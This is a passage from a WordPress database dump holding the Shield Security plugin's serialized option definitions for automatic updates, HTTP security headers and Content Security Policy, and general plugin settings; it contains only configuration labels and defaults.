disabled!\";}i:2;a:10:{s:3:\"key\";s:15:\"autoupdate_core\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:10:\"core_minor\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:10:\"core_never\";s:4:\"text\";s:5:\"Never\";}i:1;a:2:{s:9:\"value_key\";s:10:\"core_minor\";s:4:\"text\";s:19:\"Minor Versions Only\";}i:2;a:2:{s:9:\"value_key\";s:10:\"core_major\";s:4:\"text\";s:24:\"Major and Minor Versions\";}}s:9:\"link_info\";s:19:\"https://shsec.io/3x\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"WordPress Core Updates\";s:7:\"summary\";s:66:\"Decide how the WordPress Core will automatically update, if at all\";s:11:\"description\";s:94:\"At least automatically upgrading minor versions is recommended (and is the WordPress default).\";}i:3;a:9:{s:3:\"key\";s:25:\"enable_autoupdate_plugins\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:7:\"Plugins\";s:7:\"summary\";s:28:\"Automatically Update Plugins\";s:11:\"description\";s:73:\"Note: Automatic updates for plugins are disabled on WordPress by default.\";}i:4;a:10:{s:3:\"key\";s:36:\"enable_individual_autoupdate_plugins\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:7:\"premium\";b:1;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:27:\"Individually Select Plugins\";s:7:\"summary\";s:49:\"Select Individual Plugins To Automatically Update\";s:11:\"description\";s:111:\"Turning this on will provide an option on the plugins page to select whether a plugin is automatically updated.\";}i:5;a:9:{s:3:\"key\";s:24:\"enable_autoupdate_themes\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:6:\"Themes\";s:7:\"summary\";s:27:\"Automatically Update Themes\";s:11:\"description\";s:72:\"Note: Automatic updates for themes are disabled on WordPress by default.\";}i:6;a:9:{s:3:\"key\";s:30:\"enable_autoupdate_translations\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Translations\";s:7:\"summary\";s:33:\"Automatically Update Translations\";s:11:\"description\";s:77:\"Note: Automatic updates for translations are enabled on WordPress by default.\";}i:7;a:9:{s:3:\"key\";s:28:\"enable_autoupdate_ignore_vcs\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Ignore Version Control\";s:7:\"summary\";s:50:\"Ignore Version Control Systems Such As GIT and SVN\";s:11:\"description\";s:168:\"If you use SVN or GIT and WordPress detects it, automatic updates are disabled by default. Check this box to ignore version control systems and allow automatic updates.\";}i:8;a:10:{s:3:\"key\";s:12:\"update_delay\";s:7:\"section\";s:15:\"section_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"0\";s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/e5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Update Delay\";s:7:\"summary\";s:47:\"Delay Automatic Updates For Period Of Stability\";s:11:\"description\";s:94:\"Shield will delay upgrades until the new update has been available for the set number of days.\";}i:9;a:10:{s:3:\"key\";s:22:\"autoupdate_plugin_self\";s:7:\"section\";s:15:\"section_options\";s:7:\"default\";s:4:\"auto\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:4:\"auto\";s:4:\"text\";s:21:\"Let The Plugin Decide\";}i:1;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:2;a:2:{s:9:\"value_key\";s:9:\"immediate\";s:4:\"text\";s:19:\"As Soon As Possible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/3x\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"WordPress Core Updates\";s:7:\"summary\";s:66:\"Decide how the WordPress Core will automatically update, if at all\";s:11:\"description\";s:94:\"At least automatically upgrading minor versions is recommended (and is the WordPress default).\";}i:10;a:9:{s:3:\"key\";s:33:\"enable_upgrade_notification_email\";s:7:\"section\";s:15:\"section_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Send Report Email\";s:7:\"summary\";s:42:\"Send email notices after automatic updates\";s:11:\"description\";s:81:\"You can turn on/off email notices from automatic updates by un/checking this box.\";}i:11;a:10:{s:3:\"key\";s:22:\"override_email_address\";s:7:\"section\";s:15:\"section_options\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Report Email Address\";s:7:\"summary\";s:42:\"Where to send upgrade notification reports\";s:11:\"description\";s:65:\"If this is empty, it will default to the Site Admin email address\";}i:12;a:6:{s:3:\"key\";s:14:\"delay_tracking\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:13;a:5:{s:3:\"key\";s:16:\"selected_plugins\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:1:{s:20:\"action_hook_priority\";i:1000;}s:10:\"meta_modts\";i:1582303038;}','yes'),(334246,'shield_mod_config_cc05fa5b71ee35431ed1a0f1e71815df','a:5:{s:4:\"slug\";s:7:\"headers\";s:10:\"properties\";a:13:{s:4:\"slug\";s:7:\"headers\";s:4:\"name\";s:12:\"HTTP Headers\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:7:\"headers\";s:7:\"tagline\";s:29:\"Control HTTP Security Headers\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:80;}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:24:\"section_security_headers\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"Advanced Security Headers\";s:11:\"title_short\";s:16:\"Security Headers\";s:7:\"summary\";a:2:{i:0;s:92:\"Purpose - Protect visitors to your site by implementing increased security response headers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:1;a:4:{s:4:\"slug\";s:31:\"section_content_security_policy\";s:5:\"title\";s:23:\"Content Security Policy\";s:11:\"title_short\";s:23:\"Content Security Policy\";s:7:\"summary\";a:2:{i:0;s:105:\"Purpose - Restrict the sources and types of content that may be loaded and processed by visitor browsers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:2;a:4:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_headers\";s:5:\"title\";s:27:\"Enable Module: HTTP Headers\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:92:\"Purpose - Protect visitors to your site by implementing increased security response headers.\";i:1;s:101:\"Recommendation - Enabling these features are advised, but you must test them on your site thoroughly.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:13:{i:0;a:9:{s:3:\"key\";s:14:\"enable_headers\";s:7:\"section\";s:37:\"section_enable_plugin_feature_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/aj\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:19:\"Enable HTTP Headers\";s:7:\"summary\";s:43:\"Enable (or Disable) The HTTP Headers module\";s:11:\"description\";s:71:\"Un-Checking this option will completely disable the HTTP Headers module\";}i:1;a:10:{s:3:\"key\";s:7:\"x_frame\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:13:\"on_sameorigin\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:3:\"off\";s:4:\"text\";s:24:\"Off: iFrames Not Blocked\";}i:1;a:2:{s:9:\"value_key\";s:13:\"on_sameorigin\";s:4:\"text\";s:36:\"On: Allow iFrames On The Same Domain\";}i:2;a:2:{s:9:\"value_key\";s:7:\"on_deny\";s:4:\"text\";s:21:\"On: Block All iFrames\";}}s:9:\"link_info\";s:19:\"https://shsec.io/78\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:13:\"Block iFrames\";s:7:\"summary\";s:33:\"Block Remote iFrames Of This Site\";s:11:\"description\";s:139:\"The setting prevents any external website from embedding your site in an iFrame. This is useful for preventing so-called ClickJack attacks.\";}i:2;a:9:{s:3:\"key\";s:13:\"x_xss_protect\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/79\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:14:\"XSS Protection\";s:7:\"summary\";s:38:\"Employ Built-In Browser XSS Protection\";s:11:\"description\";s:80:\"Directs compatible browsers to block what they detect as Reflective XSS attacks.\";}i:3;a:9:{s:3:\"key\";s:14:\"x_content_type\";s:7:\"section\";s:24:\"section_security_headers\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7a\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:18:\"Prevent Mime-Sniff\";s:7:\"summary\";s:27:\"Turn-Off Browser Mime-Sniff\";s:11:\"description\";s:60:\"Reduces visitor exposure to malicious user-uploaded content.\";}i:4;a:11:{s:3:\"key\";s:17:\"x_referrer_policy\";s:7:\"section\";s:24:\"section_security_headers\";s:9:\"sensitive\";b:0;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:10:\"unsafe-url\";s:13:\"value_options\";a:10:{i:0;a:2:{s:9:\"value_key\";s:10:\"unsafe-url\";s:4:\"text\";s:45:\"Default: Full Referrer URL (aka \'Unsafe URL\')\";}i:1;a:2:{s:9:\"value_key\";s:11:\"no-referrer\";s:4:\"text\";s:11:\"No Referrer\";}i:2;a:2:{s:9:\"value_key\";s:26:\"no-referrer-when-downgrade\";s:4:\"text\";s:26:\"No Referrer When Downgrade\";}i:3;a:2:{s:9:\"value_key\";s:11:\"same-origin\";s:4:\"text\";s:11:\"Same Origin\";}i:4;a:2:{s:9:\"value_key\";s:6:\"origin\";s:4:\"text\";s:6:\"Origin\";}i:5;a:2:{s:9:\"value_key\";s:13:\"strict-origin\";s:4:\"text\";s:13:\"Strict Origin\";}i:6;a:2:{s:9:\"value_key\";s:24:\"origin-when-cross-origin\";s:4:\"text\";s:24:\"Origin When Cross-Origin\";}i:7;a:2:{s:9:\"value_key\";s:31:\"strict-origin-when-cross-origin\";s:4:\"text\";s:31:\"Strict Origin When Cross-Origin\";}i:8;a:2:{s:9:\"value_key\";s:5:\"empty\";s:4:\"text\";s:12:\"Empty Header\";}i:9;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:33:\"Disabled - Don\'t Send This Header\";}}s:9:\"link_info\";s:19:\"https://shsec.io/a5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Referrer Policy\";s:7:\"summary\";s:22:\"Referrer Policy Header\";s:11:\"description\";s:141:\"The Referrer Policy Header allows you to control when and what referral information a browser may pass along with links clicked on your site.\";}i:5;a:9:{s:3:\"key\";s:32:\"enable_x_content_security_policy\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7d\";s:9:\"link_blog\";s:19:\"https://shsec.io/7c\";s:4:\"name\";s:30:\"Enable Content Security Policy\";s:7:\"summary\";s:54:\"Enable (or Disable) The Content Security Policy module\";s:11:\"description\";s:75:\"Allows for permission and restriction of all resources loaded on your site.\";}i:6;a:9:{s:3:\"key\";s:9:\"xcsp_self\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:4:\"Self\";s:7:\"summary\";s:22:\"Allow \'self\' Directive\";s:11:\"description\";s:117:\"Using \'self\' is generally recommended. It essentially means that resources from your own host:protocol are permitted.\";}i:7;a:9:{s:3:\"key\";s:11:\"xcsp_inline\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Inline Entities\";s:7:\"summary\";s:28:\"Allow Inline Scripts and CSS\";s:11:\"description\";s:76:\"Allows parsing of Javascript and CSS declared in-line in your html document.\";}i:8;a:9:{s:3:\"key\";s:9:\"xcsp_data\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Embedded Data\";s:7:\"summary\";s:24:\"Allow \'data:\' Directives\";s:11:\"description\";s:80:\"Allows use of embedded data directives, most commonly used for images and fonts.\";}i:9;a:9:{s:3:\"key\";s:9:\"xcsp_eval\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Allow eval()\";s:7:\"summary\";s:23:\"Allow Javascript eval()\";s:11:\"description\";s:50:\"Permits the use of Javascript the eval() function.\";}i:10;a:9:{s:3:\"key\";s:10:\"xcsp_https\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:5:\"HTTPS\";s:7:\"summary\";s:22:\"HTTPS Resource Loading\";s:11:\"description\";s:50:\"Allows loading of any content provided over HTTPS.\";}i:11;a:10:{s:3:\"key\";s:10:\"xcsp_hosts\";s:7:\"section\";s:31:\"section_content_security_policy\";s:9:\"sensitive\";b:1;s:7:\"default\";a:1:{i:0;s:1:\"*\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/ga\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Permitted Hosts\";s:7:\"summary\";s:27:\"Permitted Hosts and Domains\";s:11:\"description\";s:276:\"You can explicitly state which hosts/domain from which content may be loaded. Take great care and test your site as you may block legitimate resources. If in-doubt, leave blank or use \'*\' only. Note: You can force only HTTPS for a given domain by prefixing it with \'https://\'.\";}i:12;a:10:{s:3:\"key\";s:11:\"xcsp_custom\";s:7:\"section\";s:31:\"section_content_security_policy\";s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/g9\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Manual Rules\";s:7:\"summary\";s:16:\"Manual CSP Rules\";s:11:\"description\";s:58:\"Manual CSP rules which are not covered by the rules above.\";}}s:10:\"meta_modts\";i:1582303038;}','yes'),(334236,'shield_mod_config_bc1ec010e329c3dc878e0d9f1a1a3e66','a:6:{s:10:\"properties\";a:15:{s:4:\"slug\";s:6:\"plugin\";s:4:\"name\";s:16:\"General Settings\";s:10:\"menu_title\";s:8:\"Settings\";s:21:\"show_module_menu_item\";b:1;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:6:\"plugin\";s:7:\"tagline\";s:23:\"General Plugin Settings\";s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:10;}s:13:\"admin_notices\";a:8:{s:17:\"override-forceoff\";a:6:{s:2:\"id\";s:17:\"override-forceoff\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:15:\"plugin-disabled\";a:6:{s:2:\"id\";s:15:\"plugin-disabled\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}s:17:\"compat-sgoptimize\";a:7:{s:2:\"id\";s:17:\"compat-sgoptimize\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:12:\"plugin_admin\";s:6:\"ignore\";s:16:\"plugin_page_only\";b:0;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:7:\"warning\";}s:14:\"wizard_welcome\";a:3:{s:2:\"id\";s:14:\"wizard_welcome\";s:8:\"per_user\";b:0;s:4:\"type\";s:4:\"info\";}s:26:\"plugin-mailing-list-signup\";a:4:{s:2:\"id\";s:26:\"plugin-mailing-list-signup\";s:16:\"min_install_days\";i:5;s:4:\"type\";s:5:\"promo\";s:12:\"drip_form_id\";s:9:\"250437573\";}s:23:\"plugin-update-available\";a:2:{s:2:\"id\";s:23:\"plugin-update-available\";s:4:\"type\";s:7:\"warning\";}s:14:\"allow-tracking\";a:4:{s:2:\"id\";s:14:\"allow-tracking\";s:12:\"plugin_admin\";b:1;s:16:\"min_install_days\";i:3;s:4:\"type\";s:5:\"promo\";}s:11:\"rate-plugin\";a:3:{s:2:\"id\";s:11:\"rate-plugin\";s:16:\"min_install_days\";i:30;s:4:\"type\";s:5:\"promo\";}}s:8:\"sections\";a:6:{i:0;a:5:{s:4:\"slug\";s:16:\"section_defaults\";s:7:\"primary\";b:1;s:5:\"title\";s:15:\"Plugin Defaults\";s:11:\"title_short\";s:15:\"Plugin Defaults\";s:13:\"help_video_id\";s:9:\"338533495\";}i:1;a:4:{s:4:\"slug\";s:30:\"section_general_plugin_options\";s:5:\"title\";s:22:\"General Plugin Options\";s:11:\"title_short\";s:15:\"General Options\";s:13:\"help_video_id\";s:9:\"338540386\";}i:2;a:4:{s:4:\"slug\";s:26:\"section_third_party_google\";s:5:\"title\";s:16:\"Google reCAPTCHA\";s:11:\"title_short\";s:16:\"Google reCAPTCHA\";s:13:\"help_video_id\";s:9:\"338546796\";}i:3;a:3:{s:4:\"slug\";s:20:\"section_importexport\";s:5:\"title\";s:15:\"Import / Export\";s:11:\"title_short\";s:15:\"Import / Export\";}i:4;a:3:{s:4:\"slug\";s:31:\"section_global_security_options\";s:5:\"title\";s:30:\"Global Plugin Security Options\";s:11:\"title_short\";s:14:\"Disable Shield\";}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:27:{i:0;a:9:{s:3:\"key\";s:29:\"global_enable_plugin_features\";s:7:\"section\";s:31:\"section_global_security_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:33:\"Enable/Disable All Plugin Modules\";s:7:\"summary\";s:27:\"Global Plugin On/Off Switch\";s:11:\"description\";s:50:\"Uncheck this option to disable all Shield features\";}i:1;a:9:{s:3:\"key\";s:15:\"enable_tracking\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7i\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:28:\"Enable Information Gathering\";s:7:\"summary\";s:44:\"Permit Anonymous Usage Information Gathering\";s:11:\"description\";s:198:\"Allows us to gather information on statistics and features in-use across our client installations. This information is strictly anonymous and contains no personally, or otherwise, identifiable data.\";}i:2;a:11:{s:3:\"key\";s:22:\"visitor_address_source\";s:7:\"section\";s:16:\"section_defaults\";s:9:\"sensitive\";b:0;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:14:\"AUTO_DETECT_IP\";s:13:\"value_options\";a:11:{i:0;a:2:{s:9:\"value_key\";s:14:\"AUTO_DETECT_IP\";s:4:\"text\";s:31:\"Automatically Detect Visitor IP\";}i:1;a:2:{s:9:\"value_key\";s:11:\"REMOTE_ADDR\";s:4:\"text\";s:11:\"REMOTE_ADDR\";}i:2;a:2:{s:9:\"value_key\";s:21:\"HTTP_CF_CONNECTING_IP\";s:4:\"text\";s:21:\"HTTP_CF_CONNECTING_IP\";}i:3;a:2:{s:9:\"value_key\";s:20:\"HTTP_X_FORWARDED_FOR\";s:4:\"text\";s:20:\"HTTP_X_FORWARDED_FOR\";}i:4;a:2:{s:9:\"value_key\";s:16:\"HTTP_X_FORWARDED\";s:4:\"text\";s:16:\"HTTP_X_FORWARDED\";}i:5;a:2:{s:9:\"value_key\";s:14:\"HTTP_X_REAL_IP\";s:4:\"text\";s:14:\"HTTP_X_REAL_IP\";}i:6;a:2:{s:9:\"value_key\";s:22:\"HTTP_X_SUCURI_CLIENTIP\";s:4:\"text\";s:22:\"HTTP_X_SUCURI_CLIENTIP\";}i:7;a:2:{s:9:\"value_key\";s:20:\"HTTP_INCAP_CLIENT_IP\";s:4:\"text\";s:20:\"HTTP_INCAP_CLIENT_IP\";}i:8;a:2:{s:9:\"value_key\";s:22:\"HTTP_X_SP_FORWARDED_IP\";s:4:\"text\";s:22:\"HTTP_X_SP_FORWARDED_IP\";}i:9;a:2:{s:9:\"value_key\";s:14:\"HTTP_FORWARDED\";s:4:\"text\";s:14:\"HTTP_FORWARDED\";}i:10;a:2:{s:9:\"value_key\";s:14:\"HTTP_CLIENT_IP\";s:4:\"text\";s:14:\"HTTP_CLIENT_IP\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dn\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Visitor IP Address\";s:7:\"summary\";s:22:\"Which Address Is Yours\";s:11:\"description\";s:85:\"There are many way to detect visitor IP addresses. Please select yours from the list.\";}i:3;a:10:{s:3:\"key\";s:24:\"block_send_email_address\";s:7:\"section\";s:16:\"section_defaults\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Report Email\";s:7:\"summary\";s:27:\"Where to send email reports\";s:11:\"description\";s:66:\"If this is empty, it will default to the blog admin email address.\";}i:4;a:9:{s:3:\"key\";s:27:\"enable_upgrade_admin_notice\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"In-Plugin Notices\";s:7:\"summary\";s:31:\"Display Plugin Specific Notices\";s:11:\"description\";s:105:\"Disable this option to hide certain plugin admin notices about available updates and post-update notices.\";}i:5;a:9:{s:3:\"key\";s:20:\"display_plugin_badge\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/5v\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf20\";s:4:\"name\";s:17:\"Show Plugin Badge\";s:7:\"summary\";s:33:\"Display Plugin Badge On Your Site\";s:11:\"description\";s:187:\"Enabling this option helps support the plugin by spreading the word about it on your website. The plugin badge also demonstrates to visitors that you take your website security seriously.\";}i:6;a:9:{s:3:\"key\";s:27:\"enable_xmlrpc_compatibility\";s:7:\"section\";s:16:\"section_defaults\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"XML-RPC Compatibility\";s:7:\"summary\";s:56:\"Allow Login Through XML-RPC To By-Pass Login Guard Rules\";s:11:\"description\";s:95:\"Enable this if you need XML-RPC functionality e.g. if you use the WordPress iPhone/Android App.\";}i:7;a:10:{s:3:\"key\";s:19:\"importexport_enable\";s:7:\"section\";s:20:\"section_importexport\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/do\";s:9:\"link_blog\";s:19:\"https://shsec.io/dp\";s:4:\"name\";s:19:\"Allow Import/Export\";s:7:\"summary\";s:65:\"Allow Import Of Options To, And Export Of Options From, This Site\";s:11:\"description\";s:68:\"Uncheck this box to completely disable import and export of options.\";}i:8;a:9:{s:3:\"key\";s:22:\"importexport_masterurl\";s:7:\"section\";s:20:\"section_importexport\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Auto-Import URL\";s:7:\"summary\";s:43:\"Automatically Import Options From This Site\";s:11:\"description\";s:115:\"Supplying a valid site URL here will make this site an \'Options Slave\' and will automatically import options daily.\";}i:9;a:11:{s:3:\"key\";s:22:\"importexport_whitelist\";s:7:\"section\";s:20:\"section_importexport\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Export Whitelist\";s:7:\"summary\";s:68:\"Whitelisted Sites Which Do Not Need The Secret Key To Export Options\";s:11:\"description\";s:132:\"Each site on this list will be able to export options from this site without providing the secret key. Take a new line for each URL.\";}i:10;a:10:{s:3:\"key\";s:29:\"importexport_whitelist_notify\";s:7:\"section\";s:20:\"section_importexport\";s:9:\"sensitive\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Notify Whitelist\";s:7:\"summary\";s:59:\"Notify Sites On The Whitelist To Update Options From Master\";s:11:\"description\";s:110:\"When enabled, manual options saving will notify sites on the whitelist to export options from the Master site.\";}i:11;a:11:{s:3:\"key\";s:22:\"importexport_secretkey\";s:7:\"section\";s:20:\"section_importexport\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:16:\"noneditable_text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"Secret Key\";s:7:\"summary\";s:24:\"Import/Export Secret Key\";s:11:\"description\";s:79:\"Keep this Secret Key private as it will allow the import and export of options.\";}i:12;a:9:{s:3:\"key\";s:20:\"delete_on_deactivate\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Delete Plugin Settings\";s:7:\"summary\";s:51:\"Delete All Plugin Settings Upon Plugin Deactivation\";s:11:\"description\";s:67:\"Careful: Removes all plugin options when you deactivate the plugin.\";}i:13;a:11:{s:3:\"key\";s:22:\"google_recaptcha_style\";s:7:\"section\";s:26:\"section_third_party_google\";s:7:\"premium\";b:1;s:7:\"default\";s:5:\"light\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:1;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:2;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dq\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"reCAPTCHA Style\";s:7:\"summary\";s:49:\"How Google reCAPTCHA Will Be Displayed By Default\";s:11:\"description\";s:109:\"You can choose the reCAPTCHA display format that best suits your site, including the new Invisible 